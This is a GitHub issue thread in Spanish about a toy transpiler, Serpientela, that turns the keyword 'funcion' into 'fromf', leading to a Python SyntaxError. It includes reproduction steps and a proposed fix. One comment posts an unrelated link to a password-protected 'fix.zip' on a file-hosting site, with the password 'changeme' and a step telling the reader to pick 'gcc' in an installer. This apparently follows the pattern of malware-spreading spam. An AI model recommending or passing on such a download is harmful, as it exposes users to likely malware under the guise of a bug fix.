### ISSUE TITLE
Problema al traducir la palabra "funcion" en archivo .se

### ISSUE THREAD

**Issue by Bredalis** [Bredalis/Serpientela#1]
Al intentar crear una función en un archivo `.se`, al ejecutarlo, no funciona correctamente. El problema surge al traducir la palabra `funcion` de español a inglés, lo que resulta en una traducción incorrecta como `fromf saludar()`. Parece que el traductor está también afectando otra parte de la palabra, pero no está claro cuál. Esto provoca que el programa no se pueda ejecutar con éxito.

**Pasos para reproducir el error:**
1. Crea un archivo `.se`.
2. Define una función en el archivo, como `funcion saludar():`.
3. Guarda los cambios.
4. Ejecuta `python Interprete.py`.
5. Ingresa el nombre del archivo `.se`.

**Error esperado:**
Debería aparecer un error como el siguiente:

```
Traceback (most recent call last):
  File "C:\Users\Bradalis\Desktop\LenguajesDeProgramacion\Python\Hackathons\Serpientela\Scripts\Interprete.py", line 41, in <module>
    exec(contenido_traducido)
  File "<string>", line 8
    fromf saludar():
          ^^^^^^^
SyntaxError: invalid syntax
```

**Comportamiento esperado:**
Las funciones o cualquier otra sentencia deberían ejecutarse sin problemas sin que se traduzca incorrectamente.

**Propuesta de solución:**
1. Abre el archivo `Interprete.py`.
2. Revisa el diccionario encargado de traducir las palabras clave del lenguaje.
3. Mejora la funcionalidad de traducción para evitar que este tipo de error ocurra, asegurando que `funcion` y otras palabras clave se traduzcan correctamente sin afectar a otras partes del código.

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Bredalis** [comment]
Para qué es eso?
